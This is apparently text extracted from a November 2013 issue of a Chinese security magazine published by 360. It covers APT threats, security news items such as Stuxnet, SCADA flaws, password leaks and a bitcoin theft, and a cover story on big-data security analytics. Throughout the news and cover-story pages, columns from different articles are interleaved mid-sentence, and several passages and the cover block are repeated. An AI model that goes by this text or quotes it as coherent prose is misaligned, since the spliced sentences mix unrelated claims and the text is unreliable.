2013年 第五期 11月刊

SECURITY INSIGHT P.004 / 调查显示： 数据安全是新技术普及瓶颈

P.022 / LG智能电视 是如何收集用户数据的?

P.025 / PHP邮件注入攻击及原理

P.094 / 终端安全,从云端做起

P.096 / 高级威胁现状和应对技术浅淡

P.099 / 谁能窥视你基于云环境的数据?

P.010 / 大数据 引发安全行业变革 SECURITY INSIGHT 2013.11 卷首语 | FROM THE EDITOR www.securityinsight.com

这个世界已经不一样

据说，现在这世界上只有两种公司，一种是已经被黑客拿下的公司，一种是被黑客拿下自己还不知道的公司。

我们不妨看看频频发生的安全事件 2013年10月，慧达驿站软件漏洞导致连锁酒店数据库被拖库：2000万条开房记录泄露； 2013年7月，Java Struts 2报高危漏洞，据传某著名电商被拖库，超5亿用户信息被盗； 2013年3月20日，韩国3.2万台终端MBR被删除，3家电视台、2家银行系统瘫痪； 2012年7月，雅虎服务器被黑 45.3万份用户信息遭泄露 ..... 目前，企业在内网、外网都面临着安全威胁，外网安全是DDoS攻击；内网安全面临的是APT攻击，比如对 Google的极光攻击、夜龙攻击、RSA SecurID种子文件被偷、超级工厂病毒攻击、Shady RAT攻击。

APT攻击是成本相对比较高的攻击方式，也是一种组合型的攻击，会用到社会工程学、漏洞挖掘、木马免杀、 漏洞攻击、无线攻击、密码破解、钓鱼攻击、加密解密等手段，具有长期性、潜伏性、成本高昂的特点。过去APT 都是情报和军工居多，现在看到针对企业也很多。

APT特点令传统防御手段渐趋势微。这主要因为过去的攻击是一次性的，防备手段没有上下文（Context），更多 是基于过滤。不管是第三、第四层的过滤，还是第七层的过滤，如果被对手盯住一点点往里渗透，对防卫要求高很 多。传统的安全技术显然缺乏检测和防范如此复杂攻击的能力。

要对付APT等新兴攻击的挑战，必须存储海量的异常行为与数据，以便用于进一步的复杂演算，否则就没办法 对历史行为进行检测。数据的绝对量和新型威胁的复杂性使过去使用的分析工具难以取得效果：信息处理或分析显 得分散凌乱，无法结合起来综合分析判断。

大数据安全分析可以获取、关联和分析来自多个设备的事件信息、异常行为数据，确定风险值，从而查明威胁 是否存在，让更频繁的事件或带来更大风险的事件浮出水面。这会从根本上改变传统的安全产业。

在本期杂志中，我们汇集了业内专家在互联网安全大会上针对APT的相关分析，以及国际上对大数据安全分析 的前瞻见解，希望可以给国内用户、安全企业同行带来参考。

360公司 副总裁

互联网安全 ｜ 001 目 录 CONTENTS 报告 REPORT 074 ｜ 互联网时代的企业安全发展趋势（下） 专刊

2013年 第五期 11月刊

SECURITY INSIGHT P.004 / 调查显示： 数据安全是新技术普及瓶颈

P.022 / LG智能电视 是如何收集用户数据的?

P.025 / PHP邮件注入攻击及原理

P.094 / 终端安全,从云端做起

P.096 / 高级威胁现状和应对技术浅淡

P.099 / 谁能窥视你基于云环境的数据?

P.010 / 大数据 引发安全行业变革

互联网安全

主 办 360互联网安全中心 360 Internet Security Center 专 栏 COLUMN

主 编 Editor-in-Chief 094 ｜ 终端安全,从云端做起 谭晓生 Tan Xiaosheng -周鸿祎

096 ｜ 高级威胁现状和应对技术浅淡 市场总监 Marketing Director

-John Vecchi 韩笑 Han Xiao

099 ｜ 谁能窥视你基于云环境的数据? 编 辑 Editors -Thomas J. Trappler 李建平 Li Jianping

吕 航 Lv Hang 封面故事 COVER STORY 010 大数据引发安全行业变革 杂志投稿 Content Contact 电 话 8610-5682 2025 传 真 8610-5878 1411 邮 件 [email protected] 030 ｜ 新型威胁分析与防范研究 卷首语 FROM THE EDITOR 034 ｜ 新型威胁的应对之策 001 ｜ 这个世界已经不一样 杂志赠阅 Magzine Circulation 电 话 8610- 5682 2025 策 略 TACTICS 传 真 8610- 5878 1411 要 闻 NEWS 邮 件 [email protected] 036 ｜ 木马反查杀技术分析之浅谈白利用 004 ｜ 调查显示：数据安全是新技术普及瓶颈 051 ｜ jboss远程命令执行漏洞分析 本刊文章观点只代表作者个人意见，不代表《互联网安全》杂志及 360公司立场。部分文章来自互联网，作者无法联系，请阅后及时联系 前 沿 THE CUTTING EDGE ISC专题 ISC ARTICLES 沟通稿费事宜。

022 ｜ LG智能电视是如何收集用户数据的? 058 ｜ APT防御——未知攻,焉知防 025 ｜ PHP邮件注入攻击及原理 061 ｜ APT分析与大数据计算思考 065 ｜ Android平台的安全隐患 本刊为非卖品 The Magazine is Not for Sale

SECURITY INSIGHT 2013.11 要 闻 www.securityinsight.com NEWS

俄核电站和国际空间站曾感染震 子黎明2的演习。 网蠕虫 毕马威信息保护及业务弹性小组合作伙伴史蒂 调查显示：数据安全是新技术普及瓶颈 芬·邦纳（Stephen Bonner）表示：“现在黑客 攻击普遍存在，攻击者包括从高智商个人到尖端复 卡巴斯基创始人Eugene Kaspersky透露，俄 杂的国家政权，目标包括从安全要求高的处理系统 罗斯的一座核电站曾感染Stuxnet蠕虫。 Stuxnet 到价格敏感的交易数据。这次演习是在我们的网络 在信息化日益普及的今天，数据安全已成为永 用上首要考虑的因素。 是至今创造最复杂的恶意程序之一，设计感染和破 防御遭到真正攻击前消除漏洞的好机会。”这次在 恒的话题，而每一个新技术的应用和普及过程中， 坏伊朗Natanz核工厂的铀浓缩设施，幕后作者被认 伦敦的演习由英格兰银行、财政部和金融市场行为 安全性都是用户考虑的关键因素。《经济学人》杂 《经济学人》的报告还显示，尽管企业的一把 为是美国和以色列。Stuxnet被认为是通过U盘感染 监管局联合举行。 志日前发布的《中国公司与变革性IT——正在进行 手对新技术的应用充满热情，但仍对数据安全问 了Natanz核工厂的计算机系统，该工厂的计算机网 中的革命》调研报告中显示，中国企业在采纳信 题忧心忡忡。约四分之三的董事会成员/首席高管 络不与外界连接。俄罗斯的这个未指明的核电站也 据英国安全机构称，几年来伦敦上市公司因网 息技术时所面临的最大担忧就是数据安全，保护 将数据安全视为采纳云计算及大数据分析的潜在 没有与外网连接，推测可能也经由U盘感染。卡巴 络攻击而损失了8亿英镑（约合12.9亿美元）。伦 敏感信息已成为新技术普及应用的最大障碍。在 障碍之一。就移动数据而言，该数据为65%，仍 斯基认为，开发Stuxnet、 Gauss、Flame和Red 敦律师事务所SJ Berwin的合伙人安德鲁·温菲尔 这方面，中国与其他地方的公司都是相同的。 然是非常大的比例。但对于企业的部门主管来 October等恶意程序的成本可能高达千万美元。卡 德（Andrew Wingfield）称，醒鲨2的结果将影 说，他们并不会将数据安全视为新技术应用的潜 巴斯基还提及国际空间站运行Windows XP的笔记 响英国未来的监管法规。他表示：“更直接的结果 通常来说，企业在投资应用新技术之前，他们 在障碍，但与其他部门的同事相比，IT部门以及 本曾感染了W32.Gammima.AG蠕虫。国际空间站 是，将确认或拷问英国作为投资安全地和金融服务 最关心是否要向新技术的第三方供应商(有关大数 金融/审计职能部门(分别是负责数据安全而且其工 笔记本系统目前已经切换到了Debian 6。 全球领先者的地位。” 据和云计算服务的)提供敏感信息，以及如何(在 作与敏感信息紧密联系)的人员明显地更为关心数 移动应用的情况下)保护员工手上的设备所存储的 据安全问题。 信息。斯诺登事件的曝光，美国监听丑闻的愈演 愈烈让信息安全成为众多企业和组织在新技术应

英国举行大规模网络攻防演习 黑客对美医疗网站发DDoS攻击 安全成为采纳新技术的潜在障碍 （％受访者认为数据安全是采纳新技术得潜在障碍） 11月12日，数十名银行人士、监管机构和政府 安全公司 Arbor Networks 发现了一个设计对 官员将聚集在伦敦市中心的Plaisterers大厅，评估 奥巴马健保网站 Healthcare.gov 发动拒绝服务攻 80 董事会／首席高官 其他 伦敦如何应对一系列网络破坏活动，如对证券交易 击的工具。开发者宣称，“ObamaCare 是对公民 70 所和社交媒体电脑系统的大规模攻击。这次“网络 60 宪法权利的侮辱，我们有权行使不服从权利。” 50 军演”旨在测试伦敦金融市场对网络破坏者的防御 40 能力。 Arbor 的研究人员表示，没有证据显示 Health- 30 care.gov 上线以来遭到了严重的拒绝服务攻击，指 20 除了Plaisterers大厅外，数百位其他人士也将 出这个 DoS 工具传播并不广泛，而且功能有限。 10 在自己的办公室里参加这次代号为醒鲨2的测试。 该工具被认为是用 Delphi 程序编写，因此有人怀疑 0 一位消息人士称，模拟演习将关注于证券市场，以 云计算 大数据 移动技术 开发者年龄在 30 岁以上。 及银行和企业与政府的沟通和协调，和他们之间相 互的沟通和协调。此前纽约也曾搞过一次代号为量

004 ｜ 互联网安全 互联网安全 ｜ 005 SECURITY INSIGHT 2013.11 要 闻 www.securityinsight.com NEWS

Websense发布2014年 研究发现：多数SCADA系统存漏洞 微软成立反网络犯罪 网络安全8大预测 中心 日前，Websense安全实验室™ 的网络安全专家们发布了2014年的8 11月15日，微软设立新网络犯罪中心 大安全预测，帮助企业在整个威胁杀 （Cybercrime Center），旨在针对 伤链的各阶段有效防御攻击。报告内 全球恶意软件、僵尸网络以及其他互 容包括关于高级攻击趋势、新的漏洞 联网犯罪行为进行实时追踪并予以打 利用工具包、安全性攻击、云安全、 击。微软打击互联网犯罪已有数年之 专业社交网络危险以及Java危害等的 久，期间也曾为破获僵尸网络犯罪做 建议和详细报道。 出重大贡献。 微软网络犯罪中心将在公司总部大楼 Websense安全研究副总裁 内隔出独立空间，为特定员工使用。 Charles Renert表示：“在2014年， 微软 此外，微软还将为第三方合作伙伴设 网络攻击将变得更加复杂和多样化。 立安全的、独立的区间。网络安全专 虽然高级恶意软件的整体数量会有所 SCADA 家可免费且无时间限制的使用该中心 “台风海燕”成电子邮件地址搜索式攻击新宠 减少，但我们预测针对性攻击和数据 设施，以与微软协作对可疑对象展开 损坏事件的数量将会增加。在攻击者 意大利安全公司ReVuln 上的西门子软件的攻击。 调查。 们不断寻求新的方法以求在威胁周期 称，其研究人员在西门子、 微软的主要犯罪中心成员包括了企业 给菲律宾带来重创的超强台 最近此类攻击信件会佯装 的各个阶段渗透传统防御措施的同 GE和施耐德等制造商的 研究人员表示，SCADA 内部法律顾问、研究侦查员、技术专 风海燕(Haiyan)，近期也变成网 成主流新闻媒体，发布与台风 时，企业必须设法使其安全防御措施 SCADA系统应用软件发现大量 系统似乎还停留在上世纪九十 家以及法医分析师，目的是为了更好 络世界里令人头疼的一个麻烦。 海燕相关的新闻，再经上述的 处于良好的工作状态，以抵御不同的 零日漏洞。Exodus Intelli- 年代。工控系统没有软件开发 地结合与利用公司研究人员、安全专 赛门铁克于11月20日监测到一 筛选机制获得有效的电子邮件 网络攻击。” gence公司研究人员则宣称从 周期管理。其中包含大量 家以及法律顾问等资源。该中心工作 起以“海燕”为名的大型电子邮 名单。为避免被垃圾邮件过滤 上述公司的SCADA系统软件上 ActiveX及文档格式缺陷。研 环境具有现代化特色，气氛更像是美 件地址搜索式攻击(Directory 器识别，垃圾邮件制造者将发 Websense 2014年安全预测的 发现了超过20个安全漏洞 。 究人员发现工控安全的状况有 剧CSI中的场景，而不是企业中常见 Harvest Attack)。 电子邮件地 件人与标题内容设为随机生 重点如下：1、高级恶意软件数量会 些可笑。最有趣的是发现这些 的办公场所。 址搜索式攻击(简称DHA)是垃圾 成，以避免大量同一标题和同 减少、2、重大数据破坏攻击将会发 SCADA系统（数据采集与 缺陷很容易。第一个可利用的 犯罪中心的一部分工作可能涉及僵尸 邮件制造者用来确定有效电邮地 一寄信人的可疑邮件被系统轻 生； 3、攻击者的目标会从网络转 监视控制系统）是用来运行公 零日漏洞从软件安装到发现只 网从被感染电脑窃取数百万美元的案 址的一个手法。垃圾邮件写手将 易过滤。 向云端数据； 4、Redkit、Neutri- 共事业、制造厂和其他关键设 用了7分钟。对于经常审计企 件，但也有一些是更为独特的挑战。 大量电邮发出后，会接到许多‘ no和其他漏洞利用工具包开发者将会 施的，现在已经成为安全研究 业和消费领域软件的人士来 如微软内部法医实验室曾辅助一家硬 拒收’或‘地址无效’的反馈。 赛门铁克首席安全系统工 经历市场地位之争；5、Java仍将是 人员和攻击者的研究对象。与 说，SCADA系统相比简单得 件设备生产商，以寻找被盗的3600台 一来一回，垃圾邮件写手就 程师建议，为避免垃圾邮件制 攻击者利用的重点； 6、攻击者将 流行的Web应用或企业软件相 不可思议。 笔记本电脑。由于每台电脑都有独特 可以通过对比原始寄送清单与遭 造者通过对比原始清单与遭拒 越来越多的通过专业社交网络吸引高 比，针对工控软件的攻击记录 的激活码，微软员工因此可以根据这 拒清单来筛选出哪些电子邮件地 清单的手段了解到真正有效的 管并入侵企业； 7、在“数据交换 还比较少，但的确发生过。其 些信息创建笔记本电脑的激活地图。 址是真正有效的，从而跟进更多 电邮地址。 链”中，攻击者会针对最薄弱环节； 中最著名的就是震网蠕虫，就 的垃圾邮件、网路钓鱼邮件以及 8、由于对攻击资源的错误认定导致 是针对安装在伊朗铀浓缩设施 内含恶意软件的邮件。 的安全性攻击错误。

006 ｜ 互联网安全 互联网安全 ｜ 007 security insight 2013.11 要 闻 www.securutyinsight.com NEWS

2014 五大恶意软件趋势 影响的3800万用户中，200万使用123456作为密码。

安全咨询顾问Patrick Thomas表示，很显然，过

日前，IBM全资的公司Trusteer发布了专业人 去数年来，密码重复使用是对普通互联网用户的最主 士及终端用户应留意的2014年五大危险恶意软件趋势。 要威胁之一。“企业应该通过自动加密来确保数据安 全，并通过实施精细化访问控制和基于角色的安全来

出现在榜单的威胁包括： 继续加速恶意软件源发 控制管理员访问存放敏感数据的系统。” 布的代码泄露问题;使用老技巧越过最新检测激素的 破坏者;以及增加使用逃逸策略躲避研究人员检测的 恶意软件。 比特币支付机构遭攻击，损失超 百万美元 此外，Trusteer还预测， 行骗者通过受害者设 备（而非自己设备）利用账号接管的方式，将会大行 从11月15日-17日，欧洲主要比特币支付服务机 其道。此外，该公司还表示，2014年手机短信转发恶 构---丹麦BIPS的系统遭受DDoS攻击，入侵者悄悄 意软件的使用将会无所不在。转发手机SMS信息的功 地并成功偷窃了1295个比特币，价值100万美金。日 能将会成为主要恶意软件的标准配置。 前该公司已经关闭了其免费的在线支付服务。

该公司CTO Klein表示，他认为一些老式技巧在 持续的DDoS攻击从11月15日开始。两天后，另 2014年将非常危险。 “我们看到越来越多恶意软件 一场攻击导致BIPS网站瘫痪，使得数个用户的账户遭 阻止受害者与真正的财务网站交互，或者将受害者从 受损失。BIPS 称，DDoS攻击源于俄罗斯及周边国 开始就引离真实的网站。” 他提到了浏览器中间人 家，并认为两次攻击是有关联的。 (man-in-the-browser, MitB)风格的HTML注入和 BIPS CEO克里斯·亨里克森(Kris Henriksen)表 转发欺骗等攻击。 示，大部分丢失的比特币为该公司自行持有。BIPS采 用基于供需关系的算法计算所需的比特币数量，并将 其置于“热钱包”中。此次比特币被窃事件并不是由 密码简单成严重安全威胁 于该公司的程序代码本身有任何缺陷。

据报道，约会服务网站Cupid Media泄漏的近 比特币 4200万用户姓名、邮箱、密码和生日被发现与其他被 盗信息保存在同一个服务器上，包括Adobe、PR Newswire、LexisNexis和National White Collar Crime Center等网站数以亿计的记录。

据调查此事的科技记者Brian Krebs称，这些信息 以明文存储，近200万用户使用123456作为密码。 120万可以使用111111作为密码。

安全公司Stricture咨询集团 本月透露，在10月受

008 ｜ 互联网安全 互联网安全 ｜ 065 SECURITY INSIGHT 2013.11 www.securityinsight.com

大数据能不能像改变医疗、零售和教育等其 量安全数据很困难或者根本不可能。 封面故事 COVER STORY 他行业一样改变安全行业？专家们认为，大数据 将会极大改变安全行业，这是由于安全分析人员 从无数工具和事件管理系统收集而来的信息具有 绝对数量多、格式复杂的特点。大多数信息安全 部门不得不应对从众多服务器、工作站、防火墙、 数据的“海洋” 大数据引发安全行业变革 入侵检测系统和反病毒软件收集而来的大量数据。 企业战略集团（ESG）对美国市场的一项新 研究表明：越来越庞大的数据量给安全研究人员 带来挑战。如今，越来越多的企业收集的数据比 为应对安全威胁及跟上IT基础设施的变化，企业在收集、处理、存储 两年前多得多，主要是为了检测高级威胁和用于 和分析越来越多的数据。在这片数据“海洋”中，专业安全人员要清除真 大数据安全分析是炒作？ 分析安全事件，另外是为了确保符合审计和合规 正的威胁显得极其困难。大数据安全分析解决方案则可通过分析和描述不 目标。ESG的数据表明，大企业在收集更多迥 与大多数热门的IT流行词语一样，大数据分 异的数据源，将这些数据联机保存更长时间，并 同信息源间的关系，运用分析技术洞察全局，从而有望完全改变安全生态 析大部分“炒作”出自厂商们之手，目的是为了 将数据用于更多类型的安全分析和调查。尽管如 系统。 推销产品。一批拥趸者起到了推波助澜的作用， 此，收集和分析内部数据再也远远不够了。 综合编译 他们过于迷恋某一种技术解决方案，无视该解决 方案所存在的缺点或局限。由于安全是大多数企 赛门铁克公司印度和南亚区域的销售总经理 业关注的一大问题（也是受制于各项政府和行业 Anand Naik指出：“为了应对安全威胁，以及 监管法规的企业所必需的），大数据安全分析方 跟上IT基础设施方面的变化，大企业在收集、处 面更是不乏炒作。 理、存储和分析越来越多的数据。举例说，ESG 发现，76%的企业在企业内部收集用户活动方面 正如Monterey Technology Group CEO 的数据，75%的企业收集防火墙日志数据，74% Randy Franklin Smith在主题为《认清炒作： 的企业收集物理安全活动方面的数据。” 大数据安全分析到底是什么？》的网络研讨会上 解释的那样，一旦你识破了种种夸张的说法，就 在数据“海洋”中，安全专业人员要清除真 会发现安全工作其实可以得益于大数据分析解决 正的威胁显得极其困难。目前的安全工具无力检 方案。 测和防范复杂的威胁。IBM印度/南亚公司安全解 决方案部门业务部门主管Vaidyanathan R Iyer 知名调研机构Gartner的副总裁兼研究员 表示：“目前的安全解决方案依赖边界防御，主 Neil McDonald曾表示，识别可能危险的网络 要致力于阻止攻击。传统的安全技术缺乏检测和 活动的大数据分析解决方案正成为一种必需品， 防范这类攻击所需要的复杂功能和洞察能力。它 而不是奢侈品。McDonald预测，到2016年， 们顶多解决问题的一个方面而已。” 大数据安全分析解决方案会被40%的企业所使用 。一些公司认为，这种解决方案已在使用中。企 由于移动、社交和云计算等技术相互融合， 业战略集团（ESG）在2012年年底开展的一项 安全威胁加快变化，进入到不同的阶段，数量和 调查显示，44%的企业已将安全分析归入“大数 复杂性急剧增加。尤其是移动恶意软件威胁已上 据”一类；同样有44%的企业表示计划在两年内 升到了一个新的水平。趋势科技公司印度和南亚 也会这么做。 区域的全国区经理Amit Nath说：“由于许多安 卓设备广泛使用，许多恶意程序已经开始潜伏于 这到底意味着什么呢？McDonald认为这是 手机平台。企业看到这类设备访问企业网络，这 结合安全数据集和操作数据集的一种方式，也就 对它们来说是个大问题。” 是“面向IT的商业智能”（BI for IT）。换句话 说，我们谈论的是海量安全数据，与其他类型的 大数据一样，使用传统方法和应用软件来处理海

互联网安全 ｜ 011 封面故事 COVER STORY SECURITY INSIGHT 2013.11 www.securityinsight.com

安全厂商F-Secure也强调了这个事实。该公 纵观大局 复杂，在此不作任何深入探讨，但如果你数学方面 司最近警告，2013年头三个月期间，移动威胁的 “传统的安全技术缺乏 很在行，会觉得卡内基梅隆大学的Kong-wei Lye 数量就增加了近50%。威胁还变得更加个性化、更 目前的安全分析工具往往是专门化的；每个工 和Jeannette Wing合著的这篇文章颇有意思：《 检测和防范复杂攻击的 复杂，因而极难被发现。赛门铁克公司的Naik解释 具旨在识别某些类型的威胁，比如恶意软件或企图 网络安全中的博弈策略》（Game Strategies in 道：“每种威胁比以前更有针对性了，这意味着在 能力。” 入侵网络的行为。这个问题与医疗行业出现的问题 Network Security）。 外头的样本数量非常少。这有助于避免被传统指纹 如出一辙：比如说，给患者看病的仅仅是几个专科 ――IBM印度/南亚公司 识别方法所发现。这种复杂的多途径攻击给首席信 医生，而没有通看各科的“全科”医生，比如经过 如果有些人青睐一种更简单的方法，还可以从 息安全官（CISO）带来挑战，那就是不仅要知道 安全解决方案部门业务 培训，查看病人总体健康状况的普通医生或内科医生。 另一方面关注博弈论，了解我们应往哪个方向走， 恶意软件是什么，还要知道恶意软件的所有特点， 以便调整企业的安全策略，应对日益复杂的网络和

比如它从哪里来，它是不是仍在网络上，它的目标 部门主管Vaidyanat 任何一个领域的专家都往往几乎全身心扑在自 日益狡猾的威胁。在足球到象棋的大多数策略博弈 又是什么？搞清楚这些答案就好比是大海捞针，但 中，规划防御性战术和进攻性战术很重要。可以将 han R Iyer 己的专业领域。假设你发了一笔横财，税务律师往 在当前利润压缩、增效节约的环境下，最重要的是 往只看到税务方面的影响，家庭法律师只着眼于通 这视为需要被动性措施和主动性措施的一种延伸。 洞察力，而不是信息。” 过改变你的婚姻状况来保护这笔钱，不一而足。虽 然专门的安全分析工具有其一席之地，但大企业需 在过去，安全的主题一向是防御。我们甚至称 险所必不可少的数据，而不是在攻击已经发生、破坏 要有能力洞察整个企业的总体安全状况，可惜大多 自己的安全计划是“深层防御”（defense in 已经造成之后，坐等被动应对。最终，大数据安全 数企业缺少这个能力。 depth）。防御性安全措施包括：防火墙、反恶意 软件和反病毒软件、填补软件安全漏洞的安全更 大数据安全分析如何问世 分析的目标是，将安全数据整合到整体商业智能 中，让安全数据成为决策过程的一部分。 让我们无法看到大局的其他因素限制了我们分 新、服务器“加固”等措施。这些措施不会一夜之 析的数据类型。如果仅仅着眼于传统的安全日志文 间销声匿迹-----而大数据安全分析解决方案旨 想了解如何大数据安全分析解决方案是如何问 许多公司竭力改善安全模式，让安全成为业务 件，就看不到安全问题或攻击的早期迹象。连非结 在添加一种更具“进攻性”的策略，包括持续不断 世的，我们先要看看SIM（安全信息管理）这个概 流程中更不可或缺的一部分，它们在此过程中发现 构化数据源也能提供线索，比如博客和社交网络网 地监控响应流程，并实现自动化。 念，SIM本身是SIEM（安全信息和事件管理）的 了这点：由于数据的绝对量和新型威胁的复杂性， 站上的帖子或电子邮件。大数据就是处理结构化数 一部分。SIM这部分涉及安全日志数据的存储、分 很难使用过去可以使用的那些工具。市面上有许多 据和非结构化数据――但是你为了分析而收集的数 检测是关键，绝大多数安全泄密事件在发作之 析和报告，而SEM（安全事件管理）这部分处理 这样的工具，但是它们常常没有结合起来使用，因 据类型越多，需要分析的数据总量就会越大，这完 初没有被企业察觉，而只有极少数安全专业人员信 进入日志的数据的监控和收集，以及根据这些信息 而信息的处理或分析显得分散凌乱。大数据安全分 全会导致需要更好的新工具：可以处理这些类型的 心十足地表示，他们会知道系统何时受到危及。但 发出实时通知和警报。 析包括，从各数据源（比如日志文件以及监控及记 数据，并且可灵活扩展，处理数量更多的数据。 是检测只是成功的一半――检测到泄密事件时采取 录系统、网络和用户行为的应用软件）收集和处理 什么措施，以及采取的对策有多迅速，将关系到企 大数据安全分析是从SIM/SEM/SIEM发展而 数TB、数PB或更多的安全相关信息。 业的生产力、声誉和经济收入遭到重大的影响，还 来的----它甚至更进一步，因为收集整个企业里 是遭到极小的影响。 面的更全面的数据集，然后运用先进的模式识别、 移动和云计算等新技术已带来了新的安全挑 先进的统计分析、启发式分析及其他行为分析手 战。与此同时，攻击者变得更加诡计多端，IT部 结合博弈论 即使拥有现代化的SIEM解决方案，为了消除 段，发现异常情况。这旨在识别和防止比较传统 门丧失了过去对其网络拥有的大部分严格控制权。 误报，也需要在某个时间段对数据进行手动（人工） 的工具发现不了的各种攻击，比如APT（高级持续 混合IT IT趋势导致了结合内部部署资源和云服务提 安全是个严肃话题，制定安全策略时用到 分析。更好的分析工具能够减轻这个管理负担，并 性威胁）。 供商托管的那些资源，而自带设备（BYOD）趋势 “Game”（博弈论的英文是Game Theory）这 且让整个过程的更多环节实现自动化，这进而有望 意味着，用户在选择和带来并非由公司拥有和发放 个词似乎显得很轻率，但实际上，博弈论涉及的是 缩短响应时间。当然，当分秒必争、机器处理工作 而在过去，许多公司采取一种被动的安全方法 的智能手机、平板电脑和笔记本电脑。这一切带来 战略性决策，这适用的范围绝不仅限于玩乐。这是 时，执行分析任务的软硬件具有的性能显得更加重 --无论是应对安全威胁本身，还是应对政府和行 了越来越多的信息，必须加以分析，才能随时掌控 一种用于预测行为的数据模型，已广泛应用于商 要了。大数据的分布特性很适合大规模并行处理： 业的监管法规。相比之下，大数据安全分析方法则 安全局面。这时候，大数据安全分析就派得上用场。 业、政治、生物、哲学和计算机科学等领域。 任务分摊到多个系统/处理器上进行处理，以获得 比较积极主动。它收集攻击之前或攻击期间评估风 原本不可能实现的超快处理速度。 将博弈论运用于制定计算机安全策略显得过于

012 ｜ 互联网安全 互联网安全 ｜ 013 安全厂商F-Secure也强调了这个事实。该公 司最近警告，2013年头三个月期间，移动威胁的 数量就增加了近50%。威胁还变得更加个性化、更 复杂，因而极难被发现。赛门铁克公司的Naik解释 道：“每种威胁比以前更有针对性了，这意味着在 外头的样本数量非常少。这有助于避免被传统指纹 识别方法所发现。这种复杂的多途径攻击给首席信 息安全官（CISO）带来挑战，那就是不仅要知道 恶意软件是什么，还要知道恶意软件的所有特点， 比如它从哪里来，它是不是仍在网络上，它的目标 又是什么？搞清楚这些答案就好比是大海捞针，但 在当前利润压缩、增效节约的环境下，最重要的是 洞察力，而不是信息。”

险所必不可少的数据，而不是在攻击已经发生、破坏 已经造成之后，坐等被动应对。最终，大数据安全 大数据安全分析如何问世 分析的目标是，将安全数据整合到整体商业智能 中，让安全数据成为决策过程的一部分。

想了解如何大数据安全分析解决方案是如何问 许多公司竭力改善安全模式，让安全成为业务 世的，我们先要看看SIM（安全信息管理）这个概 流程中更不可或缺的一部分，它们在此过程中发现 念，SIM本身是SIEM（安全信息和事件管理）的 了这点：由于数据的绝对量和新型威胁的复杂性， 一部分。SIM这部分涉及安全日志数据的存储、分 很难使用过去可以使用的那些工具。市面上有许多 析和报告，而SEM（安全事件管理）这部分处理 这样的工具，但是它们常常没有结合起来使用，因 进入日志的数据的监控和收集，以及根据这些信息 而信息的处理或分析显得分散凌乱。大数据安全分 发出实时通知和警报。 析包括，从各数据源（比如日志文件以及监控及记 录系统、网络和用户行为的应用软件）收集和处理 大数据安全分析是从SIM/SEM/SIEM发展而 数TB、数PB或更多的安全相关信息。 来的----它甚至更进一步，因为收集整个企业里 面的更全面的数据集，然后运用先进的模式识别、 移动和云计算等新技术已带来了新的安全挑 先进的统计分析、启发式分析及其他行为分析手 战。与此同时，攻击者变得更加诡计多端，IT部 段，发现异常情况。这旨在识别和防止比较传统 门丧失了过去对其网络拥有的大部分严格控制权。 的工具发现不了的各种攻击，比如APT（高级持续 混合IT IT趋势导致了结合内部部署资源和云服务提 性威胁）。 供商托管的那些资源，而自带设备（BYOD）趋势 意味着，用户在选择和带来并非由公司拥有和发放 而在过去，许多公司采取一种被动的安全方法 的智能手机、平板电脑和笔记本电脑。这一切带来 --无论是应对安全威胁本身，还是应对政府和行 了越来越多的信息，必须加以分析，才能随时掌控 业的监管法规。相比之下，大数据安全分析方法则 安全局面。这时候，大数据安全分析就派得上用场。 比较积极主动。它收集攻击之前或攻击期间评估风

封面故事 COVER STORY SECURITY INSIGHT 2013.11 www.securityinsight.com

称的大数据安全分析可用于风险管理规划、风险评 同样，赛门铁克的Data Insight解决方案让用 “随着安全要求不断变 分和投资决策。企业可以利用非对称的大数据安全 户可以了解谁拥有非结构化数据，谁在使用非结构 分析，确定风险分数，从而有助于更有效地将人 化数据，包括文档、演示文稿、电子表格和电子邮 化，对情境、分析以及 力、资金和安全重心集中投入到最需要这些方面 件之类的文件。该工具能够跟踪数百万个文件/文 数据存储时间段的要求 的地方。” 件夹、高工作负载带来的无数访问事件生成的数百 TB数据。 也发生了变化。” 大数据安全分析可以让CISO们面对整个技术 迈克菲等厂商明白加强用户意识的重要性，于 ――迈克菲公司印度销 架构的所有层面，实时了解安全信息、观察环境。 这弥补了如今的安全系统分析威胁的方式存在的巨 是在组织更多的安全意识活动，积极参与行业 情境的重要性 售工程团队负责人 大缺口。 论坛。 Srinivasa Boggaram 如果实施得当，大数据平台可以为CISO们带 为了防止新出现的威胁，安全工具不能只疲于 来更强的洞察力，了解成千上万四处分散的设备和 预防，还要把从不同事件获取的不同信息组合起 网络。CISO们运用先进算法，就能更准确地识别 来。比如说，眼下，事件收集软件不能满足于防火 大数据安全分析的机遇 狡猾地隐藏在貌似正常的数百个任务当中的异常 墙和IDS事件，还要融入情境，这点很重要。 Boggaram表示，传统的分析工具考虑的可能 行为。 仅仅是传统的情境信息，以及网络流量、用户身份 几乎每家厂商都明白大数据安全分析方面的大 迈克菲公司印度销售工程团队负责人Sriniva- 和位置等其他信息。但光有这些信息还不足以了解 好机遇，纷纷推出了具体的解决方案。比如说， 大数据平台还可以用来识别普遍出现在企业一 sa Boggaram强调了情境在安全方面的重要性， 发生的情况。“如果我们融入情境，情况变得不一 IBM去年推出了一大批安全软件，旨在有助于全面 些部门的欺诈模式或特点。这些洞察力可以改变如 他说：“识别整个环境中所有层面的异常事件还不 样了。什么数据在移动？应用程序受到了怎样的影 保护数据安全；IBM也是率先针对Hadoop及其他 今安全行业的运作方式，即由消极被动转为积极 够。想了解异常活动，势必要了解情境――‘谁在 响？哪些数据库被人攻击？这样一来，我们不仅能 大数据环境，提供数据安全解决方案的公司之一。 主动。 从事异常活动，从事什么异常活动，为何从事异常 深入了解当前发生的情况，还能深入了解什么信息 另外，IBM InfoSphere Guardium解决方案为基 活动。’比如说，如果用户平常不访问某宝贵数据， 从我们的环境泄露出去？这对大多数分析工具来说 于Hadoop的系统（InfoSphere BigInsights和 突然在没有装有监控软件，最近又与已知恶意软件 是宏大概念，要求过高了，但我们应对自己的环境 Cloudera），提供实时监控和自动化合规报告功 出没的外部服务器进行联系的移动设备上，使用来 提出更高要求，引入动态内容。动态内容是指能够 能。由于面对诸多数据源实现了联合控制，客户就 路不明的应用程序访问宝贵数据，这个行为就非常 了解不断变化的威胁领域，以及不断变化的风险状 能明白访问数据和应用程序的模式，从而有助于预 可疑。但要是没有情境，看起来像是用户ID在正常 况，而这牵涉整个企业的IT环境。” 防数据泄露，执行数据变更控制机制。内置的审计 访问文件。这些情境元素在不断变化，这就需要一 报告功能可用于按照计划生成合规报告，将这些报 种新的方法来确保收集这些情境元素。” 大数据安全分析有助于提供这种情境，因为可 告分发给监管团队，实现电子签名和逐级上报，并 